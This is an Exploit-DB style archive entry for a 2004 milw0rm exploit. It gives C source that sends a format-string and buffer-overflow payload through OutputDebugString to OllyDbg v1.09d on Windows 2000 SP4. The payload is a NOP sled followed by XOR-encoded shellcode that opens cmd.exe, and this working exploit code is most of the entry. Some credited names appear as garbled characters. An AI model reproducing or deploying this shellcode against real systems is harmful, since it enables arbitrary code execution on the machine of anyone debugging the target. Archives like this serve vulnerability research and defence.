Exploit opens a new cmd.exe

vendor:

by:

Ahmet Cihan (aka hurby)

7.5

CVSS

HIGH

Buffer Overflow

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 2000

2004

Exploit opens a new cmd.exe

This exploit opens a new command prompt window using a buffer overflow vulnerability. It is tested on Windows 2000 with Service Pack 4 and OllyDbg v1.09d. The exploit code is written in C and can be executed using OllyDbg by pressing the F9 key. The code is written by Ahmet Cihan (aka hurby) and credits are given to r3d_b4r0n, Murat Erdo??an (aka Stormwr), Onur Cihan (aka eurnie and 3710336), Orhan Tun????z, and Mehmet Yakut.

Mitigation:

Source

Exploit-DB raw data:

// Exploit opens a new cmd.exe.Tested on win2k(en)+sp4(en)+ollydbg v1.09d
// Open exploit with ollydebug and run the exploit from ollydebug(F9 key).
// Coded by Ahmet Cihan(a.k.a. hurby)
// Thanx to r3d_b4r0n, Murat Erdo??an(a.k.a. Stormwr), Onur Cihan(a.k.a.eurnie and 3710336), Orhan Tun????z and Mehmet Yakut.

#include <stdio.h>
#include <windows.h>
#include <winbase.h>

#pragma comment(lib,"kernel32.lib")

void main(){
        unsigned char buffer[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\x99\x40\x81\x38\x54\x55\x52\x4B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\
\x12\x75\xCC\x12\x75\xF1\xFC\xE1\xFC\xB9\xF1\xFA\xF4\xFD\xB7\x14\xDC\x61\xC9\x21\x26\x17\x98\xE1\x66\x49\
\x54\x55\x52\x4B\xCD%.1423x\x3E\x02\x4B\x02";

        OutputDebugString(buffer);
}

// milw0rm.com [2004-08-10]